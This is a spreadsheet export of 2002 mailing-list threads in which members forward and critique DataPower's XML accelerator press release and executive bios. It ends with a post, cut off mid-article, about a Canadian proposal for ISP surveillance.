&gt; processing are homegrown and done in software -- an approach 
&gt; the company 
&gt; itself tried initially and found to be inadequate with 
&gt; regards to speed 
&gt; and security. After trying the software path, the company turned to 
&gt; creating a solution that would process XML in hardware.
&gt; 
&gt; "Our XG3 execution core converts XML to machine code," said Kelly, 
&gt; adding that to his knowledge no other company's solution does. Kelly 
&gt; said in the next few months he expects the market to be flooded with 
&gt; technologies that claim to do XML processing -- claims that 
&gt; he believes 
&gt; will be mostly false.
&gt; Other content-aware switches, such as SSL (secure socket layer) 
&gt; accelerators and load balancers, look at the first 64 bytes 
&gt; of a packet, 
&gt; while the XA35 provides deeper packet inspection, looking at 
&gt; 1,400 bytes 
&gt; and thus enabling greater processing of XML data, Kelly explained.
&gt; 
&gt; The 1U-high network device has been tested against a large 
&gt; collection of 
&gt; XML and XSL data types and can learn new flavors of the 
&gt; markup language 
&gt; as they pass through the device.
&gt; 
&gt; The XA35 can be deployed in proxy mode behind a firewall and a load 
&gt; balancer, and it will inspect all traffic that passes and 
&gt; will identify 
&gt; and process those packets that are XML, Kelly said.
&gt; 
&gt; In addition to proxy mode, the device can also be used as an 
&gt; application 
&gt; co-processor. This deployment method gives administrators 
&gt; more granular 
&gt; control over what data is inspected and the application server itself 
&gt; controls the device.
&gt; 
&gt; DataPower is not the only company chasing this emerging 
&gt; market. Startup 
&gt; Sarvega, based in Burr Ridge, Ill., introduced the Sarvega 
&gt; XPE switch in 
&gt; May, and earlier this month Tarari, an Intel spin-off, 
&gt; launched with a 
&gt; focus on content processing and acceleration.
&gt; The DataPower device is now available, priced starting at 
&gt; $54,995. The 
&gt; company has announced one customer to date and says the product is in 
&gt; field trails at a number of other enterprises.
&gt; 
&gt; ==============================================================
&gt; ===========
&gt; 
&gt; DataPower has been addressing enterprise networking needs 
&gt; since it was 
&gt; founded in early 1999 by Eugene Kuznetsov, a technology visionary who 
&gt; foresaw the adverse effects XML and other next generation protocols 
&gt; would have on enterprise networks. Long before industry 
&gt; interest in XML 
&gt; grew, Kuznetsov assembled a team of world-class M.I.T. engineers and 
&gt; designed the industry's first solutions to address the unique 
&gt; requirements for processing XML. The first such solution was 
&gt; a software 
&gt; interpreter called DGXT. This software-based approach to XML 
&gt; processing 
&gt; is still licensed by many companies for use in their own 
&gt; products today.
&gt; 
&gt; Leveraging the detailed knowledge and customer experience gained from 
&gt; developing software-based accelerators, Kuznetsov's team 
&gt; raised the bar 
&gt; and designed a system for processing XML in purpose-built 
&gt; hardware. In 
&gt; 2001, DataPower's effort produced XML Generation Three (XG3â„¢), the 
&gt; industry's fastest technology for XML processing, bar none.
&gt; 
&gt; Today, XG3â„¢ technology powers the industry's first wire-speed XML 
&gt; network devices, enabling secure, high-speed applications and XML Web 
&gt; Services. While other companies are just now marketing first 
&gt; versions of 
&gt; products, DataPower is delivering its third generation of technology, 
&gt; providing an immediate return on technology investments to 
&gt; industry-leading customers and partners.
&gt; 
&gt; DataPower's M.I.T. heritage is complemented by a management team that 
&gt; brings decades of experience in the networking and computing 
&gt; industries, 
&gt; drawing veteran leaders from several successful companies including 
&gt; Akamai, Argon, Cascade, Castle Networks, Sycamore and Wellfleet.
&gt; 
&gt; ==============================================================
&gt; ===========
&gt; 
&gt; DataPower Technology Secures $9.5 Million in Funding
&gt; 
&gt; Venrock Associates, Mobius Venture Capital and Seed Capital 
&gt; Back Pioneer 
&gt; in XML-Aware Networking for Web Services
&gt; 
&gt; CAMBRIDGE, Mass. - July 8, 2002 - DataPower Technology, Inc., the 
&gt; leading provider of XML-Aware network infrastructure, today announced 
&gt; that it has secured $9.5 million in series B financing. Investors for 
&gt; this round include Venrock Associates, Mobius Venture Capital 
&gt; and Seed 
&gt; Capital Partners. Michael Tyrrell, of Venrock, Bill Burnham, 
&gt; of Mobius, 
&gt; and Jeff Fagnan, of Seed Capital, have joined DataPowerâ€™s Board of 
&gt; Directors.
&gt; 
&gt; DataPower will use this funding to accelerate development, 
&gt; marketing and 
&gt; sales of the companyâ€™s breakthrough technology for XML-Aware 
&gt; networking. 
&gt; Founded in 1999, DataPower invented the worldâ€™s first intelligent XML 
&gt; networkingÂ devices, capable of transforming XML traffic and 
&gt; transactions 
&gt; at the wire-speed enterprises need to effectively embrace Web 
&gt; services 
&gt; and other XML-centric initiatives. DataPowerâ€™s solutions are based on 
&gt; its patent-pending XML Generation Three (XG3â„¢) technology.
&gt; 
&gt; "Enterprises are adopting XML at rapid rate to facilitate inter-and 
&gt; intra-company communications but their network infrastructure is ill 
&gt; prepared to support the requirements of this new traffic type. 
&gt; DataPowerâ€™s XML-acceleration devices enable the wirespeed 
&gt; processing of 
&gt; XML that is required to support next generation enterprise 
&gt; applications," said Eugene Kuznetsov, CTO and founder of DataPower 
&gt; Technology.
&gt; 
&gt; "DataPower gives companies the ability to use XML thatâ€™s 
&gt; critical to Web 
&gt; services projects without sacrificing an ounce of 
&gt; performance." A single 
&gt; DataPower acceleration engine delivers the processing power of 10 
&gt; serversâ€”breaking the performance bottleneck associated with XML 
&gt; processing and delivering an extraordinary return on investment. In 
&gt; addition, the DataPower platform provides enhanced XML security, 
&gt; protection against XML-based denial-of-service attacks, connection of 
&gt; e-business protocols for incompatible XML data streams, load 
&gt; balancing 
&gt; between back-end servers and real-time statistics reports.
&gt; 
&gt; "In the post-bubble economy, technology investment decisions require 
&gt; laser-focused scrutiny. DataPowerâ€™s patent-pending technology 
&gt; addresses 
&gt; a very real and growing pain point for enterprises," said Michael 
&gt; Tyrrell of Venrock Associates. "By turbo-charging their networks with 
&gt; DataPowerâ€™s unique XML-Aware networking technology, companies will be 
&gt; free to adopt next generation Web services without encountering 
&gt; performance and security pitfalls."
&gt; 
&gt; "We looked long and hard for a company capable of addressing 
&gt; the rapidly 
&gt; growing problems surrounding XML message processing performance and 
&gt; security," said Bill Burnham of Mobius Venture Capital. 
&gt; "DataPower is on 
&gt; their third generation of technology. Their patent pending XML 
&gt; Generation Three (XG3)Â technology was quite simply the single most 
&gt; compelling technology solution we have seen to date."
&gt; 
&gt; "XML is not a nice-to-have, it is a must have for enterprises serious 
&gt; about optimizing application efficiency. Since 1999, 
&gt; DataPower has been 
&gt; developing solutions to facilitate enterprise use of XML and Web 
&gt; services," said Jeff Fagnan of Seed Capital Partners. "DataPowerâ€™s 
&gt; XML-acceleration devices are a key requirement for 
&gt; enterprises that rely 
&gt; on XML for mission critical applications."
&gt; 
&gt; About Venrock Associates
&gt; Venrock Associates was founded as the venture capital arm of the 
&gt; Rockefeller Family and continues a tradition of funding entrepreneurs 
&gt; that now spans over seven decades. Laurance S. Rockefeller pioneered 
&gt; early stage venture financing in the 1930s. With over 300 investments 
&gt; over a span of more than 70 years, the firm has an 
&gt; established a track 
&gt; record of identifying and supporting promising early stage, 
&gt; technology- 
&gt; based enterprises. As one of most experienced venture firms in the 
&gt; United States, Venrock maintains a tradition of collaboration with 
&gt; talented entrepreneurs to establish successful, enduring companies. 
&gt; Venrock's continuing goal is to create long-term value by assisting 
&gt; entrepreneurs in building companies from the formative stages. Their 
&gt; consistent focus on Information Technology and Life Sciences-related 
&gt; opportunities provides a reservoir of knowledge and a network of 
&gt; contacts that have proven to be a catalyst for the growth of 
&gt; developing 
&gt; organizations. Venrock's investments have included CheckPoint 
&gt; Software, 
&gt; USinternetworking, Caliper Technologies, Illumina, Niku, DoubleClick, 
&gt; Media Metrix, 3COM, Intel, and Apple Computer. With offices 
&gt; in New York 
&gt; City, Cambridge, MA, and Menlo Park, CA, Venrock is well 
&gt; positioned to 
&gt; respond to opportunities in any locale. For more information 
&gt; on Venrock 
&gt; Associates, please visit www.venrock.com
&gt; 
&gt; About Mobius Venture Capital
&gt; Mobius Venture Capital, formerly SOFTBANK Venture Capital, is a $2.5 
&gt; billion U.S.-based private equity venture capital firm managed by an 
&gt; unparalleled team of former CEOs and entrepreneurs, 
&gt; technology pioneers, 
&gt; senior executives from major technology corporations, and 
&gt; leaders from 
&gt; the investment banking community. Mobius Venture Capital specializes 
&gt; primarily in early-stage investments in the areas of: communications 
&gt; systems software and services; infrastructure software and services; 
&gt; professional services; enterprise applications; healthcare 
&gt; informatics; 
&gt; consumer and small business applications; components; and emerging 
&gt; technologies. Mobius Venture Capital combines its technology 
&gt; expertise 
&gt; and broad financial assets with the industry's best entrepreneurs to 
&gt; create a powerhouse portfolio of over 100 of the world's leading high 
&gt; technology companies. Mobius Venture Capital can be contacted by 
&gt; visiting their web site www.mobiusvc.com.
&gt; 
&gt; About Seed Capital Partners
&gt; Seed Capital Partners is an early-stage venture fund affiliated with 
&gt; SoftBank Corporation, one of the world's leading Internet 
&gt; market forces. 
&gt; Seed Capital manages funds focused primarily on companies addressing 
&gt; Internet-enabled business-to-business digital information technology 
&gt; opportunities, which are located in the Northeastern U.S., the 
&gt; southeastern region of the Province of Ontario, Canada, and 
&gt; Israel. Seed 
&gt; Capitalâ€™s portfolio includes Spearhead Technologies, 
&gt; Concentric Visions 
&gt; and CompanyDNA. For more information on Seed Capital Partners, please 
&gt; visit www.seedcp.com.
&gt; 
&gt; About DataPower Technology
&gt; DataPower Technology provides enterprises with intelligent XML-Aware 
&gt; network infrastructure to ensure unparalleled performance, 
&gt; security and 
&gt; manageability of next-generation protocols. DataPowerâ€™s 
&gt; patent-pending 
&gt; XML Generation Three (XG3â„¢) technology powers the industryâ€™s first 
&gt; wirespeed XML network devices, enabling secure, high-speed 
&gt; applications 
&gt; and XML Web Services. Founded in 1999, DataPower is now 
&gt; delivering its 
&gt; third generation of technology, providing immediate return on 
&gt; technology 
&gt; investments to industry-leading customers and partners. DataPower is 
&gt; privately held and based in Cambridge, MA. Investors include Mobius 
&gt; Venture Capital, Seed Capital Partners, and Venrock Associates.
&gt; 
&gt; CONTACT:
&gt; 
&gt; DataPower Technology, Inc.
&gt; Kieran Taylor
&gt; 617-864-0455
&gt; kieran@datapower.com
&gt; 
&gt; Schwartz Communications
&gt; John Moran/Heather Chichakly
&gt; 781-684-0770
&gt; datapower@schwartz-pr.com
&gt; 
&gt; ==============================================================
&gt; ==========
&gt; 
&gt; Steve Kelly, chairman and CEO
&gt; 
&gt; During over twenty years in the technology industry, Steve Kelly has 
&gt; built and managed global enterprise networks, provided consulting 
&gt; services to Fortune 50 businesses, and been involved in the launch of 
&gt; several start-ups. Prior to DataPower, Kelly was an 
&gt; entrepreneur-in-residence at Venrock Associates, and was 
&gt; co-founder of 
&gt; Castle Networks, where he led the company's sales, service 
&gt; and marketing 
&gt; functions. Castle was acquired by Siemens AG in 1999 to 
&gt; create Unisphere 
&gt; Networks, which was subsequently purchased by Juniper Networks. Kelly 
&gt; was an early contributor at Cascade Communications, where he 
&gt; built and 
&gt; managed the company's core switching business; Cascade's 
&gt; annual revenues 
&gt; grew from $2 million to $300 million annually during Kelly's tenure. 
&gt; Kelly also worked at Digital Equipment Corporation where he 
&gt; managed and 
&gt; grew their corporate network to 50,000+ nodes in 28 countries, the 
&gt; largest in the world at the time. Kelly has a B.S. in Information 
&gt; Systems from Bentley College.
&gt; 
&gt; Eugene Kuznetsov, founder, president and CTO
&gt; 
&gt; Eugene Kuznetsov is a technology visionary that has been working to 
&gt; address enterprise XML issues since the late 90s. Kuznetsov founded 
&gt; DataPower Technology, Inc. in 1999 to provide enterprises with an 
&gt; intelligent, XML-aware network infrastructure to support 
&gt; next-generation 
&gt; applications. Prior to starting DataPower, Kuznetsov led the Java JIT 
&gt; Compiler effort for Microsoft Internet Explorer for Macintosh 4.0. He 
&gt; was also part of the team which developed one of the first clean room 
&gt; Java VM's. This high-speed runtime technology was licensed by some of 
&gt; the industry's largest technology companies, including Apple 
&gt; Computer. 
&gt; He has consulted to numerous companies and worked on a variety of 
&gt; hardware and software engineering problems in the areas of memory 
&gt; management, power electronics, optimized execution engines and 
&gt; application integration. Kuznetsov holds a B.S. in electrical 
&gt; engineering from MIT.
&gt; 
&gt; Steve Willis, vice president of advanced technology
&gt; 
&gt; Steve Willis is an accomplished entrepreneur and a pioneer in 
&gt; protocol 
&gt; optimization. Prior to joining DataPower, Willis was 
&gt; co-founder and CTO 
&gt; of Argon Networks, a provider of high-performance switching 
&gt; routers that 
&gt; was acquired by Siemens AG in 1999 to create Unisphere Networks; 
&gt; Unisphere was subsequently purchased by Juniper Networks. 
&gt; Before Argon, 
&gt; Steve was vice president of advanced technology at Bay Networks (now 
&gt; Nortel Networks) where he led both IP and ATM-related technology 
&gt; development and managed a group that generated 24 patent 
&gt; applications, 
&gt; developed a 1 Mbps forwarding engine and led the specification of the 
&gt; ATM Forum's PNNI routing protocol. Most notably, Steve was 
&gt; co-founder, 
&gt; original software director and architect for Wellfleet 
&gt; Communications, a 
&gt; leading pioneer of multi-protocol routers. Wellfleet was rated as the 
&gt; fastest growing company in the U.S. for two consecutive years 
&gt; by Fortune 
&gt; magazine. Willis is currently a member of the Institute of Electrical 
&gt; and Electronics Engineers (IEEE) and the Internet Research Task Force 
&gt; (IRTF) Routing Research Group. Willis has a B.D.I.C. in 
&gt; Computer Science 
&gt; from the University of Massachusetts.
&gt; 
&gt; Bill Tao, vice president of engineering
&gt; 
&gt; With a vast understanding of network optimization technologies and 
&gt; extensive experience in LAN and WAN networking, Bill Tao 
&gt; brings over 25 
&gt; years of critical knowledge to lead DataPower's engineering efforts. 
&gt; Prior to DataPower, Tao was the vice president of engineering for 
&gt; Sycamore Networks, developing a family of metro/regional 
&gt; optical network 
&gt; switches. He is also well acquainted with network optimization 
&gt; techniques as he was previously vice president of engineering at 
&gt; InfoLibria, where he led development and software quality assurance 
&gt; engineering for a family of network caching products. Tao has held 
&gt; senior engineering positions at NetEdge, Proteon, Codex and Wang. Tao 
&gt; received a B.S. in Electrical Engineering from the University of 
&gt; Connecticut and an M.S. in Computer Science from the University of 
&gt; Illinois.
&gt; 
&gt; Kieran Taylor, director of product marketing
&gt; 
&gt; Kieran Taylor has an accomplished record as a marketing professional, 
&gt; industry analyst and journalist. Prior to joining DataPower, 
&gt; Taylor was 
&gt; the director of product management and marketing for Akamai 
&gt; Technologies 
&gt; (NASDAQ: AKAM). As an early contributor at Akamai, he helped 
&gt; develop the 
&gt; company's initial positioning and led the technical development and 
&gt; go-to-market activities for Akamai's flagship EdgeSuite service. 
&gt; Taylor's early contribution helped position the service provider to 
&gt; secure a $12.6 billion IPO. He has also held senior marketing 
&gt; management 
&gt; positions at Nortel Networks, Inc. and Bay Networks. Taylor was 
&gt; previously an analyst at TeleChoice, Inc. and the Wide Area Networks 
&gt; editor for Data Communications, a McGraw Hill publication. 
&gt; Taylor holds 
&gt; a B.A. in Print Journalism from the Pennsylvania State 
&gt; University School 
&gt; of Communications.
&gt; 
&gt; =================================================================
&gt; Board of Advisors
&gt; 
&gt; Mark Hoover
&gt; Mark Hoover is President and co-founder of Acuitive, Inc., a start-up 
&gt; accelerator. With over 20 years experience in the networking 
&gt; industry, 
&gt; Hoover's expertise spans product development, marketing, and business 
&gt; development. Before launching Acuitive, Hoover worked at AT&amp;T Bell 
&gt; Laboratories, AT&amp;T Computer Systems, SynOptics, and Bay 
&gt; Networks, where 
&gt; he played a role in the development of key technologies, such as 
&gt; 10-BASET, routing, FDDI, ATM, Ethernet switching, firewall, Internet 
&gt; traffic management, and edge WAN switch industries.
&gt; 
&gt; George Kassabgi
&gt; Currently Vice President of Engineering at BEA Systems, Mr. 
&gt; Kassabgi has 
&gt; held executive-level positions in engineering, sales and 
&gt; marketing, and 
&gt; has spearheaded leading-edge developments in the application server 
&gt; marketplace since 1996. He is widely known for his regular speaking 
&gt; engagements at JavaOne, as well as columns and contributions 
&gt; in JavaPro, 
&gt; Java Developer's Journal and other publications. In addition 
&gt; to being a 
&gt; venerated Java expert, George Kassabgi holds a patent on SmartObject 
&gt; Technology, and authored the technical book Progress V8.
&gt; 
&gt; Marshall T. Rose
&gt; Marshall T. Rose runs his own firm, Dover Beach Consulting, Inc. He 
&gt; formerly held the position of the Internet Engineering Task 
&gt; Force (IETF) 
&gt; Area Director for Network Management, one of a dozen individuals who 
&gt; oversaw the Internet's standardization process. Rose is the author of 
&gt; several professional texts on subjects such as Internet Management, 
&gt; Electronic Mail, and Directory Services, which have been published in 
&gt; four languages. He is well known for his implementations of core 
&gt; Internet technologies (such as POP, SMTP, and SNMP) and OSI 
&gt; technologies 
&gt; (such as X.500 and FTAM). Rose received a PhD in Information and 
&gt; Computer Science from the University of California, Irvine, in 1984.
&gt; 
&gt; </t>
  </si>
  <si>
    <t>On 27 Aug 2002 at 15:00, Rohit Khare wrote:&gt; DataPower delivers XML acceleration device
&gt; ByÂ Scott Tyler Shafer
&gt; August 27, 2002 5:46 am PT
&gt; 
Intel also had a similar device a couple of years ago (Netstructure).  They have, afaik, abandoned it.Intel is still in the XML hardware game though.  On 8/19 they spun off a company named Tarari.   Tarari develops hardware to check the headers of IP packets. Tarari calls 
this Layer 7 processing (atop the OSI model).    From what I can tell, Tarari plans to combine virus scanning and XML acceleration into a single hardware device.</t>
  </si>
  <si>
    <t>Hardware acceleration for SSL makes sense since PKI can slow down a
transaction by as much as 1,000-fold. Per this article, XML formatting only
increases doc size by about 20-fold.. I'm not sure there are enough "powers
of ten" in there to justify hardware acceleration. Expect the next major release from DataPower to be the revolutionary new
"email chip" - allows you to offload the sending and receiving of email
messages onto dedicated hardware while you get on w/ more important things
.. like listening to MP3s..Best, 
Paul Sholtz-----Original Message-----
From: Rohit Khare
To: fork@spamassassin.taint.org
Sent: 8/27/02 3:00 PM
Subject: DataPower announces XML-in-siliconNo analysis yet... don't know what to make of it yet. But here's the rawbits for all to peruse and check out what's really going on... Best, 
Rohit===========================================================DataPower delivers XML acceleration device
ByÂ Scott Tyler Shafer
August 27, 2002 5:46 am PTDATAPOWER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officials.The new device, dubbed DataPower XA35 XML Accelerator, is the first in afamily of products expected from the Cambridge, Mass.-based startup. TheDataPower family is based on a proprietary processing core technology 
called XG3 that does the analysis, parsing, and processing of the XML 
data.According to Steve Kelly, CEO of DataPower, the XA35 Accelerator was 
conceived to meet the steady adoption of XML, the anticipated future 
proliferation of Web services, and as a means to share data between two 
businesses."Our vision is to build out an XML-aware infrastructure," Kelly said. 
"The XA35 is the first of a family."Kelly explained that converting data into XML increases the file size upto 20 times. This, he said, makes processing the data very taxing on 
application servers; DataPower believes an inline device is the best 
alternative.In addition to the large file sizes, security is also of paramount 
importance in the world of XML."Today's firewalls are designed to inspect HTTP traffic only," Kelly 
said. "A SOAP packet with XML will go straight through a firewall. 
Firewalls are blind to XML today."Future products in DataPowers family will focus more specifically on 
security, especially as Web services proliferate, Kelly said.According to DataPower, most existing solutions to offload XML 
processing are homegrown and done in software -- an approach the companyitself tried initially and found to be inadequate with regards to speed 
and security. After trying the software path, the company turned to 
creating a solution that would process XML in hardware."Our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packet,while the XA35 provides deeper packet inspection, looking at 1,400 bytesand thus enabling greater processing of XML data, Kelly explained.The 1U-high network device has been tested against a large collection ofXML and XSL data types and can learn new flavors of the markup language 
as they pass through the device.The XA35 can be deployed in proxy mode behind a firewall and a load 
balancer, and it will inspect all traffic that passes and will identify 
and process those packets that are XML, Kelly said.In addition to proxy mode, the device can also be used as an applicationco-processor. This deployment method gives administrators more granular 
control over what data is inspected and the application server itself 
controls the device.DataPower is not the only company chasing this emerging market. Startup 
Sarvega, based in Burr Ridge, Ill., introduced the Sarvega XPE switch inMay,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
=DataPower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today.Leveraging the detailed knowledge and customer experience gained from 
developing software-based accelerators, Kuznetsov's team raised the bar 
and designed a system for processing XML in purpose-built hardware. In 
2001, DataPower's effort produced XML Generation Three (XG3â„¢), the 
industry's fastest technology for XML processing, bar none.Today, XG3â„¢ technology powers the industry's first wire-speed XML 
network devices, enabling secure, high-speed applications and XML Web 
Services. While other companies are just now marketing first versions ofproducts, DataPower is delivering its third generation of technology, 
providing an immediate return on technology investments to 
industry-leading customers and partners.DataPower's M.I.T. heritage is complemented by a management team that 
brings decades of experience in the networking and computing industries,drawing veteran leaders from several successful companies including 
Akamai, Argon, Cascade, Castle Networks, Sycamore and Wellfleet.========================================================================
=DataPower Technology Secures $9.5 Million in FundingVenrock Associates, Mobius Venture Capital and Seed Capital Back Pioneerin XML-Aware Networking for Web ServicesCAMBRIDGE,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DataPowerâ€™s Board of 
Directors.DataPower will use this funding to accelerate development, marketing andsales of the companyâ€™s breakthrough technology for XML-Aware networking.Founded in 1999, DataPower invented the worldâ€™s first intelligent XML 
networkingÂ devices, capable of transforming XML traffic and transactionsat the wire-speed enterprises need to effectively embrace Web services 
and other XML-centric initiatives. DataPowerâ€™s solutions are based on 
its patent-pending XML Generation Three (XG3â„¢) technology."Enterprises are adopting XML at rapid rate to facilitate inter-and 
intra-company communications but their network infrastructure is ill 
prepared to support the requirements of this new traffic type. 
DataPowerâ€™s XML-acceleration devices enable the wirespeed processing of 
XML that is required to support next generation enterprise 
applications," said Eugene Kuznetsov, CTO and founder of DataPower 
Technology."DataPower gives companies the ability to use XML thatâ€™s critical to Webservices projects without sacrificing an ounce of performance." A singleDataPower acceleration engine delivers the processing power of 10 
serversâ€”breaking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reports."In the post-bubble economy, technology investment decisions require 
laser-focused scrutiny. DataPowerâ€™s patent-pending technology addresses 
a very real and growing pain point for enterprises," said Michael 
Tyrrell of Venrock Associates. "By turbo-charging their networks with 
DataPowerâ€™s unique XML-Aware networking technology, companies will be 
free to adopt next generation Web services without encountering 
performance and security pitfalls.""We looked long and hard for a company capable of addressing the rapidlygrowing problems surrounding XML message processing performance and 
security," said Bill Burnham of Mobius Venture Capital. "DataPower is ontheir third generation of technology. Their patent pending XML 
Generation Three (XG3)Â technology was quite simply the single most 
compelling technology solution we have seen to date.""XML is not a nice-to-have, it is a must have for enterprises serious 
about optimizing application efficiency. Since 1999, DataPower has been 
developing solutions to facilitate enterprise use of XML and Web 
services," said Jeff Fagnan of Seed Capital Partners. "DataPowerâ€™s 
XML-acceleration devices are a key requirement for enterprises that relyon XML for mission critical applications."About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www.venrock.comAbout Mobius Venture Capital
Mobius Venture Capital, formerly SOFTBANK Venture Capital, is a $2.5 
billion U.S.-based private equity venture capital firm managed by an 
unparalleled team of former CEOs and entrepreneurs, technology pioneers,senior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www.mobiusvc.com.About Seed Capital Partners
Seed Capital Partners is an early-stage venture fund affiliated with 
SoftBank Corporation, one of the world's leading Internet market forces.Seed Capital manages funds focused primarily on companies addressing 
Internet-enabled business-to-business digital information technology 
opportunities, which are located in the Northeastern U.S., the 
southeastern region of the Province of Ontario, Canada, and Israel. SeedCapitalâ€™s portfolio includes Spearhead Technologies, Concentric Visions 
and CompanyDNA. For more information on Seed Capital Partners, please 
visit www.seedcp.com.About DataPower Technology
DataPower Technology provides enterprises with intelligent XML-Aware 
network infrastructure to ensure unparalleled performance, security and 
manageability of next-generation protocols. DataPowerâ€™s patent-pending 
XML Generation Three (XG3â„¢) technology powers the industryâ€™s first 
wirespeed XML network devices, enabling secure, high-speed applications 
and XML Web Services. Founded in 1999, DataPower is now delivering its 
third generation of technology, providing immediate return on technologyinvestments to industry-leading customers and partners. DataPower is 
privately held and based in Cambridge, MA. Investors include Mobius 
Venture Capital, Seed Capital Partners, and Venrock Associates.CONTACT:DataPower Technology, Inc.
Kieran Taylor
617-864-0455
kieran@datapower.comSchwartz Communications
John Moran/Heather Chichakly
781-684-0770
datapower@schwartz-pr.com========================================================================Steve Kelly, chairman and CEODuring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marketingfunctions. Castle was acquired by Siemens AG in 1999 to create UnisphereNetworks, which was subsequently purchased by Juniper Networks. Kelly 
was an early contributor at Cascade Communications, where he built and 
managed the company's core switching business; Cascade's annual revenuesgrew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College.Eugene Kuznetsov, founder, president and CTOEugene Kuznetsov is a technology visionary that has been working to 
address enterprise XML issues since the late 90s. Kuznetsov founded 
DataPower Technology, Inc. in 1999 to provide enterprises with an 
intelligent, XML-aware network infrastructure to support next-generationapplications.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MIT.Steve Willis, vice president of advanced technologySteve Willis is an accomplished entrepreneur and a pioneer in protocol 
optimization. Prior to joining DataPower, Willis was co-founder and CTO 
of Argon Networks, a provider of high-performance switching routers thatwas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aleading pioneer of multi-protocol routers. Wellfleet was rated as the 
fastest growing company in the U.S. for two consecutive years by Fortunemagazine. Willis is currently a member of the Institute of Electrical 
and Electronics Engineers (IEEE) and the Internet Research Task Force 
(IRTF) Routing Research Group. Willis has a B.D.I.C. in Computer Sciencefrom the University of Massachusetts.Bill Tao, vice president of engineeringWith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Illinois.Kieran Taylor, director of product marketingKieran Taylor has an accomplished record as a marketing professional, 
industry analyst and journalist. Prior to joining DataPower, Taylor was 
the director of product management and marketing for Akamai Technologies(NASDAQ: AKAM). As an early contributor at Akamai, he helped develop thecompany's initial positioning and led the technical development and 
go-to-market activities for Akamai's flagship EdgeSuite service. 
Taylor's early contribution helped position the service provider to 
secure a $12.6 billion IPO. He has also held senior marketing managementpositions at Nortel Networks, Inc. and Bay Networks. Taylor was 
previously an analyst at TeleChoice, Inc. and the Wide Area Networks 
editor for Data Communications, a McGraw Hill publication. Taylor holds 
a B.A. in Print Journalism from the Pennsylvania State University Schoolof Communications.=================================================================
Board of AdvisorsMark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industries.George Kassabgi
Currently Vice President of Engineering at BEA Systems, Mr. Kassabgi hasheld executive-level positions in engineering, sales and marketing, and 
has spearheaded leading-edge developments in the application server 
marketplace since 1996. He is widely known for his regular speaking 
engagements at JavaOne, as well as columns and contributions in JavaPro,Java Developer's Journal and other publications. In addition to being a 
venerated Java expert, George Kassabgi holds a patent on SmartObject 
Technology, and authored the technical book Progress V8.Marshall T. Rose
Marshall T. Rose runs his own firm, Dover Beach Consulting, Inc. He 
formerly held the position of the Internet Engineering Task Force (IETF)Area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technologies(such as X.500 and FTAM). Rose received a PhD in Information and 
Computer Science from the University of California, Irvine, in 1984.</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 27 Aug 2002, Rohit Khare wrote:&gt;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officials.Now, to do this, we all know they have to be cracking the strong crypto used
on all transaction in order to process them... So this has some preaty heavy
implications, unless it's just BS.&gt; Kelly explained that converting data into XML increases the file size up
&gt; to 20 times. This, he said, makes processing the data very taxing on
&gt; application servers; DataPower believes an inline device is the best
&gt; alternative.Or.... you could just not bloat it 20x to begin with. Nah! (that was the
whole point of XML afterall, to sell more CPUs - much like Oracle's use of
Java allows them to sell 3x more CPU licenses due to the performance hit)&gt; In addition to the large file sizes, security is also of paramount
&gt; importance in the world of XML.
&gt;
&gt; "Today's firewalls are designed to inspect HTTP traffic only," Kelly
&gt; said. "A SOAP packet with XML will go straight through a firewall.
&gt; Firewalls are blind to XML today."Again, see above... they _are_ claiming to decode the crypto...&gt; "Our XG3 execution core converts XML to machine code," said Kelly,Mmmmmmmmmmm, machine code, never a good idea ;)- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Politicians worldwide are discovering the internet - what a great tool 
for fascism, once you got the laws in place to solve that whole 
'anonymity' thing. Also I notice this story shows the truth - the 
Canadian government is really located in Washington, DC, Ottawa is just 
a branch office. Come to think of it, the last story I posted about 
Canada featured the head of its military, 'speaking to us from military 
HQ  in Palm Beach, Florida.'
Owen
----------------------------------------------------------------------------------------------------------------------------
.
*Will Canada's ISPs become spies?*
By Declan McCullagh 
Staff Writer, CNET News.com
August 27, 2002, 12:56 PM PT
http://news.com.com/2100-1023-955595.html 
*WASHINGTON--The Canadian government is considering a proposal that 
would force Internet providers to rewire their networks for easy 
surveillance by police and spy agencies.*A discussion draft  
released Sunday also contemplates creating a national database of every 
Canadian with an Internet account, a plan that could sharply curtail the 
right to be anonymous online.The Canadian government, including the Department of Justice 
 and Industry Canada 
, wrote the 21-page blueprint as a near-final step 
in a process that seeks to give law enforcement agents more authority to 
conduct electronic surveillance. A proposed law based on the discussion 
draft is expected to be introduced in Parliament late this year or in 
early 2003.Arguing that more and more communications take place in electronic form, 
Canadian officials say such laws are necessary to fight terrorism and 
combat even run-of-the-mill crimes. They also claim that by enacting 
these proposals, Canada will be following its obligations under the 
Council of Europe's cybercrime treaty 
, which the country is in the 
process of considering.If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monitoring.Canada and the United States are nonvoting members of the Council of 
Europe, and representatives from both countries' police agencies have 
endorsed the controversial cybercrime treaty 
, which has 
drawn protests from human rights activists and civil liberties groups. 
Of nearly 50 participating nations, only Albania has formally adopted 
, 
or ratified, the treaty.Michael Geist , a professor at the 
University of Ottawa who specializes in e-commerce law, says that the 
justification for adopting such sweeping changes to Canadian law seems 
weak."It seems to me that the main justification they've given for all the 
changes is that we want to ratify the cybercrime treaty and we need to 
make changes," Geist said. "To me that's not a particularly convincing 
argument. If there are new powers needed for law enforcement authority, 
make that case."Geist added that "there's nothing in the document that indicates (new 
powers) are needed. I don't know that there have been a significant 
number of cases where police have run into problems."Probably the most sweeping change the legal blueprint contemplates is 
compelling Internet providers and telephone companies to reconfigure 
their networks to facilitate government eavesdropping and data-retention 
orders. The United States has a similar requirement, called the 
Communications Assistance for Law Enforcement Act 
, but it 
applies only to pre-Internet telecommunications companies."It is proposed that all service providers (wireless, wireline and 
Internet) be required to ensure that their systems have the technical 
capability to provide lawful access to law enforcement and national 
security agencies," according to the proposal. Companies would be 
responsible for paying the costs of buying new equipment.Sarah Andrews, an analyst at the Electronic Privacy Information Center 
 (EPIC) who specializes in international law, says 
the proposal goes beyond what the cybercrime treaty specifies. "Their 
proposal for intercept capability talks about all service providers, not 
just Internet providers," Andrews said. "The cybercrime treaty deals 
only with computer data." EPIC opposes 
the cybercrime treaty, saying it grants too much power to police and 
does not adequately respect privacy rights.Another section of the proposal says the Canadian Association of Chiefs 
of Police recommends "the establishment of a national database" with 
personal information about all Canadian Internet users. "The 
implementation of such a database would presuppose that service 
providers are compelled to provide accurate and current information," 
the draft says.Gus Hosein, a visiting fellow at the London School of Economics and an 
